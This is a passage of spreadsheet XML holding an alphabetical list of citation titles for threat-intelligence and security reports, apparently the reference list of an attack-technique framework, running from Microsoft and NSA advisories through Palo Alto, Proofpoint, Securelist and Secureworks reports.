    <t>Microsoft Windows Scripts</t>
  </si>
  <si>
    <t>Microsoft Wingbird Nov 2017</t>
  </si>
  <si>
    <t>Microsoft Winnti Jan 2017</t>
  </si>
  <si>
    <t>Microsoft Wow6432Node 2018</t>
  </si>
  <si>
    <t>Microsoft XSLT Script Mar 2017</t>
  </si>
  <si>
    <t>Microsoft ZINC disruption Dec 2017</t>
  </si>
  <si>
    <t>Microsoft Zone.Identifier 2020</t>
  </si>
  <si>
    <t>Microsoft _VBA_PROJECT Stream</t>
  </si>
  <si>
    <t>Microsoft bcdedit 2021</t>
  </si>
  <si>
    <t>Microsoft driver block rules</t>
  </si>
  <si>
    <t>Microsoft getglobaladdresslist</t>
  </si>
  <si>
    <t>Microsoft gpresult</t>
  </si>
  <si>
    <t>Microsoft msiexec</t>
  </si>
  <si>
    <t>Microsoft msolrolemember</t>
  </si>
  <si>
    <t>Microsoft msxsl.exe</t>
  </si>
  <si>
    <t>Microsoft odbcconf.exe</t>
  </si>
  <si>
    <t>Microsoft runas</t>
  </si>
  <si>
    <t>Microsoft wevtutil Oct 2017</t>
  </si>
  <si>
    <t>Microsoft xp_cmdshell 2017</t>
  </si>
  <si>
    <t>Microsoft_rec_block_rules</t>
  </si>
  <si>
    <t>MimiPenguin GitHub May 2017</t>
  </si>
  <si>
    <t>Modexp Windows Process Injection</t>
  </si>
  <si>
    <t>Module Stomping for Shellcode Injection</t>
  </si>
  <si>
    <t>Mondok Windows PiggyBack BITS May 2007</t>
  </si>
  <si>
    <t>Moran 2013</t>
  </si>
  <si>
    <t>Moran 2014</t>
  </si>
  <si>
    <t>Moran RDPieces</t>
  </si>
  <si>
    <t>Morphisec Cobalt Gang Oct 2018</t>
  </si>
  <si>
    <t>Morphisec FIN7 June 2017</t>
  </si>
  <si>
    <t>Morphisec Lokibot April 2020</t>
  </si>
  <si>
    <t>Morphisec ShellTea June 2019</t>
  </si>
  <si>
    <t>MsitPros CHM Aug 2017</t>
  </si>
  <si>
    <t>MuddyWater TrendMicro June 2018</t>
  </si>
  <si>
    <t>Mythc Documentation</t>
  </si>
  <si>
    <t>Mythic Github</t>
  </si>
  <si>
    <t>Mythic SpecterOps</t>
  </si>
  <si>
    <t>NCC Group APT15 Alive and Strong</t>
  </si>
  <si>
    <t>NCC Group Chimera January 2021</t>
  </si>
  <si>
    <t>NCC Group Fivehands June 2021</t>
  </si>
  <si>
    <t>NCC Group TA505</t>
  </si>
  <si>
    <t>NCC Group Team9 June 2020</t>
  </si>
  <si>
    <t>NCC Group WastedLocker June 2020</t>
  </si>
  <si>
    <t>NCCGroup RokRat Nov 2018</t>
  </si>
  <si>
    <t>NCCIC AR-17-20045 February 2017</t>
  </si>
  <si>
    <t>NCSC APT29 July 2020</t>
  </si>
  <si>
    <t>NCSC CISA Cyclops Blink Advisory February 2022</t>
  </si>
  <si>
    <t>NCSC Cyclops Blink February 2022</t>
  </si>
  <si>
    <t>NCSC GCHQ Small Sieve Jan 2022</t>
  </si>
  <si>
    <t>NCSC Joint Report Public Tools</t>
  </si>
  <si>
    <t>NCSC Sandworm Feb 2020</t>
  </si>
  <si>
    <t>NEWSCASTER2014</t>
  </si>
  <si>
    <t>NHS Digital Egregor Nov 2020</t>
  </si>
  <si>
    <t>NHS Digital Pysa Oct 2020</t>
  </si>
  <si>
    <t>NHS UK BLINDINGCAN Aug 2020</t>
  </si>
  <si>
    <t>NIST 800-63-3</t>
  </si>
  <si>
    <t>NIST Authentication</t>
  </si>
  <si>
    <t>NIST MFA</t>
  </si>
  <si>
    <t>NIST Server Security July 2008</t>
  </si>
  <si>
    <t>NJCCIC Ursnif Sept 2016</t>
  </si>
  <si>
    <t>NSA Cyber Mitigating Web Shells</t>
  </si>
  <si>
    <t>NSA Joint Advisory SVR SolarWinds April 2021</t>
  </si>
  <si>
    <t>NSA MS AppLocker</t>
  </si>
  <si>
    <t>NSA NCSC Turla OilRig</t>
  </si>
  <si>
    <t>NSA Spotting</t>
  </si>
  <si>
    <t>NSA and ASD Detect and Prevent Web Shells 2020</t>
  </si>
  <si>
    <t>NSA/FBI Drovorub August 2020</t>
  </si>
  <si>
    <t>NT API Windows</t>
  </si>
  <si>
    <t>NTT Security Flagpro new December 2021</t>
  </si>
  <si>
    <t>NVD CVE-2014-7169</t>
  </si>
  <si>
    <t>NVD CVE-2016-6662</t>
  </si>
  <si>
    <t>NVD CVE-2017-0176</t>
  </si>
  <si>
    <t>NVD CVE-2019-3610</t>
  </si>
  <si>
    <t>NVisio Labs DDE Detection Oct 2017</t>
  </si>
  <si>
    <t>NYTStuxnet</t>
  </si>
  <si>
    <t>Narrator Accessibility Abuse</t>
  </si>
  <si>
    <t>National Vulnerability Database</t>
  </si>
  <si>
    <t>NationsBuying</t>
  </si>
  <si>
    <t>Nccgroup Emissary Panda May 2018</t>
  </si>
  <si>
    <t>Nccgroup Gh0st April 2018</t>
  </si>
  <si>
    <t>NetSPI SQL Server CLR</t>
  </si>
  <si>
    <t>NetSPI Startup Stored Procedures</t>
  </si>
  <si>
    <t>Netscout Stolen Pencil Dec 2018</t>
  </si>
  <si>
    <t>Netskope Cloud Phishing</t>
  </si>
  <si>
    <t>Netskope GCP Redirection</t>
  </si>
  <si>
    <t>Netskope Nitol</t>
  </si>
  <si>
    <t>Netskope Squirrelwaffle Oct 2021</t>
  </si>
  <si>
    <t>Netspi PowerShell Execution Policy Bypass</t>
  </si>
  <si>
    <t>New DragonOK</t>
  </si>
  <si>
    <t>Newscaster</t>
  </si>
  <si>
    <t>Nick Tyrer GitHub</t>
  </si>
  <si>
    <t>Njw0rm</t>
  </si>
  <si>
    <t>Nltest Manual</t>
  </si>
  <si>
    <t>Nmap Firewalls NIDS</t>
  </si>
  <si>
    <t>NodeJS</t>
  </si>
  <si>
    <t>NorthSec 2015 GData Uroburos Tools</t>
  </si>
  <si>
    <t>Norton Botnet</t>
  </si>
  <si>
    <t>Novetta Blockbuster</t>
  </si>
  <si>
    <t>Novetta Blockbuster Destructive Malware</t>
  </si>
  <si>
    <t>Novetta Blockbuster Loaders</t>
  </si>
  <si>
    <t>Novetta Blockbuster RATs</t>
  </si>
  <si>
    <t>Novetta Blockbuster Tools</t>
  </si>
  <si>
    <t>Novetta Winnti April 2015</t>
  </si>
  <si>
    <t>Novetta-Axiom</t>
  </si>
  <si>
    <t>NtQueryInformationProcess</t>
  </si>
  <si>
    <t>Nviso Spoof Command Line 2020</t>
  </si>
  <si>
    <t>O365 Blog Azure AD Device IDs</t>
  </si>
  <si>
    <t>OPM Leak</t>
  </si>
  <si>
    <t>OS X Keychain</t>
  </si>
  <si>
    <t>OSX Coldroot RAT</t>
  </si>
  <si>
    <t>OSX Keychain Schaumann</t>
  </si>
  <si>
    <t>OSX Keydnap malware</t>
  </si>
  <si>
    <t>OSX Malware Detection</t>
  </si>
  <si>
    <t>OSX Malware Exploits MacKeeper</t>
  </si>
  <si>
    <t>OSX.Dok Malware</t>
  </si>
  <si>
    <t>OSX.FairyTale</t>
  </si>
  <si>
    <t>OWASP Binary Planting</t>
  </si>
  <si>
    <t>OWASP CSV Injection</t>
  </si>
  <si>
    <t>OWASP Fingerprinting</t>
  </si>
  <si>
    <t>OWASP Top 10</t>
  </si>
  <si>
    <t>OWASP Vuln Scanning</t>
  </si>
  <si>
    <t>Objective See Green Lambert for OSX Oct 2021</t>
  </si>
  <si>
    <t>Objective-See MacMa Nov 2021</t>
  </si>
  <si>
    <t>ObjectiveSee AppleJeus 2019</t>
  </si>
  <si>
    <t>Obscuresecurity Get-GPPPassword</t>
  </si>
  <si>
    <t>OceanLotus for OS X</t>
  </si>
  <si>
    <t>Oddvar Moe ADS1 Jan 2018</t>
  </si>
  <si>
    <t>Oddvar Moe ADS2 Apr 2018</t>
  </si>
  <si>
    <t>Oddvar Moe IFEO APR 2018</t>
  </si>
  <si>
    <t>Oddvar Moe RunOnceEx Mar 2018</t>
  </si>
  <si>
    <t>Offensive Security VNC Authentication Check</t>
  </si>
  <si>
    <t>Office 265 Azure Domain Availability</t>
  </si>
  <si>
    <t>Office 365 Delegated Administration</t>
  </si>
  <si>
    <t>Office 365 Partner Relationships</t>
  </si>
  <si>
    <t>OilRig ISMAgent July 2017</t>
  </si>
  <si>
    <t>OilRig New Delivery Oct 2017</t>
  </si>
  <si>
    <t>Onion Routing</t>
  </si>
  <si>
    <t>Open Login Items Apple</t>
  </si>
  <si>
    <t>Operating with EmPyre</t>
  </si>
  <si>
    <t>Operation Emmental</t>
  </si>
  <si>
    <t>Operation Hangover</t>
  </si>
  <si>
    <t>Operation Hangover May 2013</t>
  </si>
  <si>
    <t>Operation Quantum Entanglement</t>
  </si>
  <si>
    <t>Operation Woolen-Goldfish</t>
  </si>
  <si>
    <t>Osanda Stealing NetNTLM Hashes</t>
  </si>
  <si>
    <t>Ossmann Star Feb 2011</t>
  </si>
  <si>
    <t>OutFlank System Calls</t>
  </si>
  <si>
    <t>Outflank MotW 2020</t>
  </si>
  <si>
    <t>Outlflank HTML Smuggling 2018</t>
  </si>
  <si>
    <t>Outlook File Sizes</t>
  </si>
  <si>
    <t>Outlook Today Home Page</t>
  </si>
  <si>
    <t>PAM Backdoor</t>
  </si>
  <si>
    <t>PAM Creds</t>
  </si>
  <si>
    <t>PAN DNS Tunneling</t>
  </si>
  <si>
    <t>PCMag DoubleExtension</t>
  </si>
  <si>
    <t>PCMag FakeLogin</t>
  </si>
  <si>
    <t>PTRACE man</t>
  </si>
  <si>
    <t>PTSecurity Cobalt Dec 2016</t>
  </si>
  <si>
    <t>PTSecurity Cobalt Group Aug 2017</t>
  </si>
  <si>
    <t>PTSecurity Higaisa 2020</t>
  </si>
  <si>
    <t>PWC Cloud Hopper April 2017</t>
  </si>
  <si>
    <t>PWC Cloud Hopper Technical Annex April 2017</t>
  </si>
  <si>
    <t>PWC KeyBoys Feb 2017</t>
  </si>
  <si>
    <t>PWC Pirpi Scanbox</t>
  </si>
  <si>
    <t>PWC WellMess C2 August 2020</t>
  </si>
  <si>
    <t>PWC WellMess July 2020</t>
  </si>
  <si>
    <t>Pace University Detecting DGA May 2017</t>
  </si>
  <si>
    <t>Palo Alto ARP</t>
  </si>
  <si>
    <t>Palo Alto Black-T October 2020</t>
  </si>
  <si>
    <t>Palo Alto CVE-2015-3113 July 2015</t>
  </si>
  <si>
    <t>Palo Alto Comnie</t>
  </si>
  <si>
    <t>Palo Alto DNS Requests</t>
  </si>
  <si>
    <t>Palo Alto Gamaredon Feb 2017</t>
  </si>
  <si>
    <t>Palo Alto MoonWind March 2017</t>
  </si>
  <si>
    <t>Palo Alto Networks BBSRAT</t>
  </si>
  <si>
    <t>Palo Alto Office Test Sofacy</t>
  </si>
  <si>
    <t>Palo Alto OilRig April 2017</t>
  </si>
  <si>
    <t>Palo Alto OilRig May 2016</t>
  </si>
  <si>
    <t>Palo Alto OilRig Oct 2016</t>
  </si>
  <si>
    <t>Palo Alto OilRig Sep 2018</t>
  </si>
  <si>
    <t>Palo Alto PlugX June 2017</t>
  </si>
  <si>
    <t>Palo Alto Prince of Persia</t>
  </si>
  <si>
    <t>Palo Alto Reaver Nov 2017</t>
  </si>
  <si>
    <t>Palo Alto Retefe</t>
  </si>
  <si>
    <t>Palo Alto Rover</t>
  </si>
  <si>
    <t>Palo Alto Shamoon Nov 2016</t>
  </si>
  <si>
    <t>Palo Alto Sofacy 06-2018</t>
  </si>
  <si>
    <t>Palo Alto T9000 Feb 2016</t>
  </si>
  <si>
    <t>Palo Alto Unit 42 EKANS</t>
  </si>
  <si>
    <t xml:space="preserve">Palo Alto Unit 42 OutSteel SaintBot February 2022 </t>
  </si>
  <si>
    <t>Palo Alto menuPass Feb 2017</t>
  </si>
  <si>
    <t>PaloAlto 3102 Sept 2015</t>
  </si>
  <si>
    <t>PaloAlto CardinalRat Apr 2017</t>
  </si>
  <si>
    <t>PaloAlto DNS Requests May 2016</t>
  </si>
  <si>
    <t>PaloAlto EncodedCommand March 2017</t>
  </si>
  <si>
    <t>PaloAlto NanoCore Feb 2016</t>
  </si>
  <si>
    <t>PaloAlto Patchwork Mar 2018</t>
  </si>
  <si>
    <t>PaloAlto UBoatRAT Nov 2017</t>
  </si>
  <si>
    <t>Pass The Cookie</t>
  </si>
  <si>
    <t>PassLib mscache</t>
  </si>
  <si>
    <t>Passcape LSA Secrets</t>
  </si>
  <si>
    <t>Password Protected Word Docs</t>
  </si>
  <si>
    <t>PaypalScam</t>
  </si>
  <si>
    <t>PegasusCitizenLab</t>
  </si>
  <si>
    <t>Peirates GitHub</t>
  </si>
  <si>
    <t>Penetration Testing Lab MSXSL July 2017</t>
  </si>
  <si>
    <t>Pentesting AD Forests</t>
  </si>
  <si>
    <t>Pentestlab Stored Credentials</t>
  </si>
  <si>
    <t>Pentestlab Token Manipulation</t>
  </si>
  <si>
    <t>Peripheral Discovery Linux</t>
  </si>
  <si>
    <t>Peripheral Discovery macOS</t>
  </si>
  <si>
    <t>PersistentJXA_leopitt</t>
  </si>
  <si>
    <t>Petri Logon Script AD</t>
  </si>
  <si>
    <t>Pfammatter - Hidden Inbox Rules</t>
  </si>
  <si>
    <t>Phish Labs Silent Librarian</t>
  </si>
  <si>
    <t>Phrack halfdead 1997</t>
  </si>
  <si>
    <t>Picus Emotet Dec 2018</t>
  </si>
  <si>
    <t>Picus Sodinokibi January 2020</t>
  </si>
  <si>
    <t>Power Automate Email Exfiltration Controls</t>
  </si>
  <si>
    <t>PowerShell About 2019</t>
  </si>
  <si>
    <t>PowerShellMagazine PowerSploit July 2014</t>
  </si>
  <si>
    <t>PowerSploit Documentation</t>
  </si>
  <si>
    <t>PowerSploit Invoke Kerberoast</t>
  </si>
  <si>
    <t>Powershell Remote Commands</t>
  </si>
  <si>
    <t>Powersploit</t>
  </si>
  <si>
    <t>Praetorian TLS Downgrade Attack 2014</t>
  </si>
  <si>
    <t>PreKageo Winhook Jul 2011</t>
  </si>
  <si>
    <t>Prevailion DarkWatchman 2021</t>
  </si>
  <si>
    <t>Prevailion EvilNum May 2020</t>
  </si>
  <si>
    <t>Prevx Carberp March 2011</t>
  </si>
  <si>
    <t>ProcessHacker Github</t>
  </si>
  <si>
    <t>Profero APT27 December 2020</t>
  </si>
  <si>
    <t>ProjectZero File Write EoP Apr 2018</t>
  </si>
  <si>
    <t>ProofPoint GoT 9002 Aug 2017</t>
  </si>
  <si>
    <t>ProofPoint Serpent</t>
  </si>
  <si>
    <t>ProofPoint SettingContent-ms July 2018</t>
  </si>
  <si>
    <t>ProofPoint Ursnif Aug 2016</t>
  </si>
  <si>
    <t>Proofpoint Azorult July 2018</t>
  </si>
  <si>
    <t>Proofpoint Bumblebee April 2022</t>
  </si>
  <si>
    <t>Proofpoint Cobalt June 2017</t>
  </si>
  <si>
    <t>Proofpoint Domain Shadowing</t>
  </si>
  <si>
    <t>Proofpoint Leviathan Oct 2017</t>
  </si>
  <si>
    <t>Proofpoint LookBack Malware Aug 2019</t>
  </si>
  <si>
    <t>Proofpoint NETWIRE December 2020</t>
  </si>
  <si>
    <t>Proofpoint Operation Transparent Tribe March 2016</t>
  </si>
  <si>
    <t>Proofpoint RTF Injection</t>
  </si>
  <si>
    <t>Proofpoint Router Malvertising</t>
  </si>
  <si>
    <t>Proofpoint TA407 September 2019</t>
  </si>
  <si>
    <t>Proofpoint TA416 Europe March 2022</t>
  </si>
  <si>
    <t>Proofpoint TA416 November 2020</t>
  </si>
  <si>
    <t>Proofpoint TA453 July2021</t>
  </si>
  <si>
    <t>Proofpoint TA453 March 2021</t>
  </si>
  <si>
    <t>Proofpoint TA459 April 2017</t>
  </si>
  <si>
    <t>Proofpoint TA505 Jan 2019</t>
  </si>
  <si>
    <t>Proofpoint TA505 June 2018</t>
  </si>
  <si>
    <t>Proofpoint TA505 Mar 2018</t>
  </si>
  <si>
    <t>Proofpoint TA505 October 2019</t>
  </si>
  <si>
    <t>Proofpoint TA505 Sep 2017</t>
  </si>
  <si>
    <t>Proofpoint Vega Credential Stealer May 2018</t>
  </si>
  <si>
    <t>Proofpoint ZeroT Feb 2017</t>
  </si>
  <si>
    <t>PsExec Russinovich</t>
  </si>
  <si>
    <t>PurpleSec Data Loss Prevention</t>
  </si>
  <si>
    <t>Purves Kextpocalypse 2</t>
  </si>
  <si>
    <t>PyPI RAR</t>
  </si>
  <si>
    <t>Pylos Xenotime 2019</t>
  </si>
  <si>
    <t>QiAnXin APT-C-36 Feb2019</t>
  </si>
  <si>
    <t>Qualys Hermetic Wiper March 2022</t>
  </si>
  <si>
    <t>Qualys LolZarus</t>
  </si>
  <si>
    <t>QueenOfClubs</t>
  </si>
  <si>
    <t>RDP Hijacking Korznikov</t>
  </si>
  <si>
    <t>RDP Hijacking Medium</t>
  </si>
  <si>
    <t>RDPWrap Github</t>
  </si>
  <si>
    <t>RFC1918</t>
  </si>
  <si>
    <t>RFC826 ARP</t>
  </si>
  <si>
    <t>RHEL auditd</t>
  </si>
  <si>
    <t>ROADtools Github</t>
  </si>
  <si>
    <t>RSA Carbanak November 2017</t>
  </si>
  <si>
    <t>RSA EU12 They're Inside</t>
  </si>
  <si>
    <t>RSA Forfiles Aug 2017</t>
  </si>
  <si>
    <t>RSA Shell Crew</t>
  </si>
  <si>
    <t>RSA2017 Detect and Respond Adair</t>
  </si>
  <si>
    <t>RSAC 2015 Abu Dhabi Stefano Maccaglia</t>
  </si>
  <si>
    <t>RSAC 2015 San Francisco Patrick Wardle</t>
  </si>
  <si>
    <t>Radware Micropsia July 2018</t>
  </si>
  <si>
    <t>Rancor Unit42 June 2018</t>
  </si>
  <si>
    <t>Rapid7 KeyBoy Jun 2013</t>
  </si>
  <si>
    <t>Rapid7 LLMNR Spoofer</t>
  </si>
  <si>
    <t>Rapid7 MiTM Basics</t>
  </si>
  <si>
    <t>Rapid7 Service Persistence 22JUNE2016</t>
  </si>
  <si>
    <t>Rapid7G20Espionage</t>
  </si>
  <si>
    <t>Rclone Wars</t>
  </si>
  <si>
    <t>Rclone-mega-extortion_05_2021</t>
  </si>
  <si>
    <t>Re-Open windows on Mac</t>
  </si>
  <si>
    <t>Ready.gov IT DRP</t>
  </si>
  <si>
    <t>Reaqta MSXSL Spearphishing MAR 2018</t>
  </si>
  <si>
    <t>Reaqta Mavinject</t>
  </si>
  <si>
    <t>Reaqta MuddyWater November 2017</t>
  </si>
  <si>
    <t>Recorded Future APT3 May 2017</t>
  </si>
  <si>
    <t>Recorded Future Beacon 2019</t>
  </si>
  <si>
    <t>Recorded Future Beacon Certificates</t>
  </si>
  <si>
    <t>Recorded Future Chinese Activity in Southeast Asia December 2021</t>
  </si>
  <si>
    <t>Recorded Future REDDELTA July 2020</t>
  </si>
  <si>
    <t>Recorded Future RedEcho Feb 2021</t>
  </si>
  <si>
    <t>Recorded Future TAG-22 July 2021</t>
  </si>
  <si>
    <t>Recorded Future Turla Infra 2020</t>
  </si>
  <si>
    <t>RecordedFuture 2021 Ad Infra</t>
  </si>
  <si>
    <t>Red Canary 2021 Threat Detection Report March 2021</t>
  </si>
  <si>
    <t>Red Canary COR_PROFILER May 2020</t>
  </si>
  <si>
    <t>Red Canary Emotet Feb 2019</t>
  </si>
  <si>
    <t>Red Canary HTA Abuse Part Deux</t>
  </si>
  <si>
    <t>Red Canary Hospital Thwarted Ryuk October 2020</t>
  </si>
  <si>
    <t>Red Canary NETWIRE January 2020</t>
  </si>
  <si>
    <t>Red Canary Qbot</t>
  </si>
  <si>
    <t>Red Canary Silver Sparrow Feb2021</t>
  </si>
  <si>
    <t>Red Canary Verclsid.exe</t>
  </si>
  <si>
    <t>Red Hat PAM</t>
  </si>
  <si>
    <t>RedCanary Mockingbird May 2020</t>
  </si>
  <si>
    <t>RedLock Instance Metadata API 2018</t>
  </si>
  <si>
    <t>Redirectors_Domain_Fronting</t>
  </si>
  <si>
    <t>Redxorblue Remote Template Injection</t>
  </si>
  <si>
    <t>Reed thiefquest fake ransom</t>
  </si>
  <si>
    <t>Register Deloitte</t>
  </si>
  <si>
    <t>Register Uber</t>
  </si>
  <si>
    <t>Registry Key Security</t>
  </si>
  <si>
    <t>Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452</t>
  </si>
  <si>
    <t>Remote Management MDM macOS</t>
  </si>
  <si>
    <t>Remote Shell Execution in Python</t>
  </si>
  <si>
    <t>Resource and Data Forks</t>
  </si>
  <si>
    <t>Retwin Directory Share Pivot</t>
  </si>
  <si>
    <t>Reuters Taiwan BlackTech August 2020</t>
  </si>
  <si>
    <t>Revil Independence Day</t>
  </si>
  <si>
    <t>Rewterz Sidewinder APT April 2020</t>
  </si>
  <si>
    <t>Rewterz Sidewinder COVID-19 June 2020</t>
  </si>
  <si>
    <t>Rhingo Security Labs GCP Privilege Escalation</t>
  </si>
  <si>
    <t>Rhino Labs Cloud Backdoor September 2019</t>
  </si>
  <si>
    <t>Rhino Labs Cloud Image Backdoor Technique Sept 2019</t>
  </si>
  <si>
    <t>Rhino S3 Ransomware Part 1</t>
  </si>
  <si>
    <t>Rhino S3 Ransomware Part 2</t>
  </si>
  <si>
    <t>Rhino Security Labs AWS Privilege Escalation</t>
  </si>
  <si>
    <t>Rhino Security Labs AWS VPC Traffic Mirroring</t>
  </si>
  <si>
    <t>Rhino Security Labs Enumerating AWS Roles</t>
  </si>
  <si>
    <t>RiskIQ British Airways September 2018</t>
  </si>
  <si>
    <t>RiskIQ Cobalt Jan 2018</t>
  </si>
  <si>
    <t>RiskIQ Cobalt Nov 2017</t>
  </si>
  <si>
    <t>RiskIQ Newegg September 2018</t>
  </si>
  <si>
    <t>Riskiq Remcos Jan 2018</t>
  </si>
  <si>
    <t>Roadtools</t>
  </si>
  <si>
    <t>Rocket Kitten</t>
  </si>
  <si>
    <t>Russian 2FA Push Annoyance - Cimpanu</t>
  </si>
  <si>
    <t>Russians Exploit Default MFA Protocol - CISA March 2022</t>
  </si>
  <si>
    <t>Russinovich Sysinternals</t>
  </si>
  <si>
    <t>S1 Custom Shellcode Tool</t>
  </si>
  <si>
    <t>S1 Old Rat New Tricks</t>
  </si>
  <si>
    <t>S1 macOs Persistence</t>
  </si>
  <si>
    <t>S2 Grupo TrickBot June 2017</t>
  </si>
  <si>
    <t>S3Recon GitHub</t>
  </si>
  <si>
    <t>SANS Application Whitelisting</t>
  </si>
  <si>
    <t>SANS Attacking Kerberos Nov 2014</t>
  </si>
  <si>
    <t>SANS Brian Wiltse Template Injection</t>
  </si>
  <si>
    <t>SANS Conficker</t>
  </si>
  <si>
    <t>SANS Decrypting SSL</t>
  </si>
  <si>
    <t>SANS Information Security Reading Room Securing SNMP Securing SNMP</t>
  </si>
  <si>
    <t>SANS PsExec</t>
  </si>
  <si>
    <t>SANS UAC Bypass</t>
  </si>
  <si>
    <t>SANS Windshift August 2018</t>
  </si>
  <si>
    <t>SCADAfence_ransomware</t>
  </si>
  <si>
    <t>SEC EDGAR Search</t>
  </si>
  <si>
    <t>SECURELIST Bright Star 2015</t>
  </si>
  <si>
    <t>SEI SSL Inspection Risks</t>
  </si>
  <si>
    <t>SMLoginItemSetEnabled Schroeder 2013</t>
  </si>
  <si>
    <t>SOCPrime DoubleExtension</t>
  </si>
  <si>
    <t>SRD GPP</t>
  </si>
  <si>
    <t>SSH Secure Shell</t>
  </si>
  <si>
    <t>SSH Tunneling</t>
  </si>
  <si>
    <t>SSH in Windows</t>
  </si>
  <si>
    <t>SSHjack Blackhat</t>
  </si>
  <si>
    <t>SSLShopper Lookup</t>
  </si>
  <si>
    <t>STIG Audit Kernel Modules</t>
  </si>
  <si>
    <t>STIG krbtgt reset</t>
  </si>
  <si>
    <t>Samba DRSUAPI</t>
  </si>
  <si>
    <t>SanDisk SMART</t>
  </si>
  <si>
    <t>Sans ARP Spoofing Aug 2003</t>
  </si>
  <si>
    <t>Sans Virtual Jan 2016</t>
  </si>
  <si>
    <t>Savill 1999</t>
  </si>
  <si>
    <t>Scarlet Mimic Jan 2016</t>
  </si>
  <si>
    <t>Schneider Electric USB Malware</t>
  </si>
  <si>
    <t>ScriptingOSX zsh</t>
  </si>
  <si>
    <t>Sean Metcalf Twitter DNS Records</t>
  </si>
  <si>
    <t>SecTools nbtscan June 2003</t>
  </si>
  <si>
    <t>Seclists Kanthak 7zip Installer</t>
  </si>
  <si>
    <t>Secpod Winexe June 2017</t>
  </si>
  <si>
    <t>Secuirtyinbits Ataware3 May 2019</t>
  </si>
  <si>
    <t>Secure Host Baseline EMET</t>
  </si>
  <si>
    <t>Secure Ideas SMB Relay</t>
  </si>
  <si>
    <t>Secure List Bad Rabbit</t>
  </si>
  <si>
    <t>SecureList Griffon May 2019</t>
  </si>
  <si>
    <t>SecureList Silence Nov 2017</t>
  </si>
  <si>
    <t>SecureList SynAck Doppelgänging May 2018</t>
  </si>
  <si>
    <t>SecureWorks August 2019</t>
  </si>
  <si>
    <t>SecureWorks BRONZE MOHAWK n.d.</t>
  </si>
  <si>
    <t>SecureWorks BRONZE UNION June 2017</t>
  </si>
  <si>
    <t>SecureWorks Mia Ash July 2017</t>
  </si>
  <si>
    <t>SecureWorks NICKEL GLADSTONE profile Sept 2021</t>
  </si>
  <si>
    <t>SecureWorks TG-4127</t>
  </si>
  <si>
    <t>SecureWorks WannaCry Analysis</t>
  </si>
  <si>
    <t>SecureWorld - How Secure Is Your Slack Channel - Dec 2021</t>
  </si>
  <si>
    <t>Securelist APT Trends April 2018</t>
  </si>
  <si>
    <t>Securelist APT Trends Q2 2017</t>
  </si>
  <si>
    <t>Securelist APT10 March 2021</t>
  </si>
  <si>
    <t>Securelist Agent.btz</t>
  </si>
  <si>
    <t>Securelist BlackEnergy Feb 2015</t>
  </si>
  <si>
    <t>Securelist BlackEnergy Nov 2014</t>
  </si>
  <si>
    <t>Securelist BlackOasis Oct 2017</t>
  </si>
  <si>
    <t>Securelist Brazilian Banking Malware July 2020</t>
  </si>
  <si>
    <t>Securelist Calisto July 2018</t>
  </si>
  <si>
    <t>Securelist DarkVishnya Dec 2018</t>
  </si>
  <si>
    <t>Securelist Darkhotel Aug 2015</t>
  </si>
  <si>
    <t>Securelist Denis April 2017</t>
  </si>
  <si>
    <t>Securelist Digital Certificates</t>
  </si>
  <si>
    <t>Securelist Dropping Elephant</t>
  </si>
  <si>
    <t>Securelist Dtrack</t>
  </si>
  <si>
    <t>Securelist Dtrack2</t>
  </si>
  <si>
    <t>Securelist GCMAN</t>
  </si>
  <si>
    <t>Securelist JSWorm</t>
  </si>
  <si>
    <t>Securelist Kimsuky Sept 2013</t>
  </si>
  <si>
    <t>Securelist LuckyMouse June 2018</t>
  </si>
  <si>
    <t>Securelist Machete Aug 2014</t>
  </si>
  <si>
    <t>Securelist Malware Tricks April 2017</t>
  </si>
  <si>
    <t>Securelist MiniDuke Feb 2013</t>
  </si>
  <si>
    <t>Securelist Minidionis July 2015</t>
  </si>
  <si>
    <t>Securelist MuddyWater Oct 2018</t>
  </si>
  <si>
    <t>Securelist Octopus Oct 2018</t>
  </si>
  <si>
    <t>Securelist Remexi Jan 2019</t>
  </si>
  <si>
    <t>Securelist ScarCruft Jun 2016</t>
  </si>
  <si>
    <t>Securelist ScarCruft May 2019</t>
  </si>
  <si>
    <t>Securelist ShadowPad Aug 2017</t>
  </si>
  <si>
    <t>Securelist Sofacy Feb 2018</t>
  </si>
  <si>
    <t>Securelist Trasparent Tribe 2020</t>
  </si>
  <si>
    <t>Securelist Turla Oct 2018</t>
  </si>
  <si>
    <t>Securelist Ventir</t>
  </si>
  <si>
    <t>Securelist WhiteBear Aug 2017</t>
  </si>
  <si>
    <t>Securelist fileless attacks Feb 2017</t>
  </si>
  <si>
    <t>Secureworks - AT.exe Scheduled Task</t>
  </si>
  <si>
    <t>Secureworks BRONZE BUTLER Oct 2017</t>
  </si>
  <si>
    <t xml:space="preserve">Secureworks BRONZE HUNTLEY </t>
  </si>
  <si>
    <t>Secureworks BRONZE PRESIDENT December 2019</t>
  </si>
  <si>
    <t>Secureworks BRONZEUNION Feb 2019</t>
  </si>
  <si>
    <t>Secureworks COBALT DICKENS August 2018</t>
  </si>
  <si>
    <t>Secureworks COBALT DICKENS September 2019</t>
  </si>
  <si>
    <t>Secureworks COBALT GYPSY Threat Profile</t>
  </si>
  <si>
    <t>Secureworks COBALT ILLUSION Threat Profile</t>
  </si>
  <si>
    <t>Secureworks COPPER FIELDSTONE Profile</t>
  </si>
  <si>
    <t>Secureworks Cobalt Gypsy Feb 2017</t>
  </si>
  <si>
    <t>Secureworks Emotet Nov 2018</t>
  </si>
  <si>
    <t>Secureworks GOLD CABIN</t>
  </si>
  <si>
    <t>Secureworks GOLD KINGSWOOD September 2018</t>
  </si>
  <si>
    <t>Secureworks GOLD KINGSWOOD Threat Profile</t>
  </si>
  <si>
    <t>Secureworks GOLD NIAGARA Threat Profile</t>
  </si>
  <si>
    <t>Secureworks GOLD SOUTHFIELD</t>
  </si>
  <si>
    <t>Secureworks GandCrab and REvil September 2019</t>
  </si>
  <si>
    <t>Secureworks IRON HEMLOCK Profile</t>
  </si>
  <si>
    <t>Secureworks IRON HUNTER Profile</t>
  </si>
  <si>
    <t>Secureworks IRON LIBERTY July 2019</t>
  </si>
  <si>
    <t>Secureworks IRON RITUAL Profile</t>
  </si>
  <si>
    <t>Secureworks IRON RITUAL USAID Phish May 2021</t>
  </si>
  <si>
    <t>Secureworks IRON TILDEN Profile</t>
  </si>
  <si>
    <t>Secureworks IRON TWILIGHT Active Measures March 2017</t>
  </si>
  <si>
    <t>Secureworks IRON TWILIGHT Profile</t>
  </si>
  <si>
    <t>Secureworks IRON VIKING</t>
  </si>
  <si>
    <t xml:space="preserve">Secureworks IRON VIKING </t>
  </si>
  <si>
    <t>Secureworks Karagany July 2019</t>
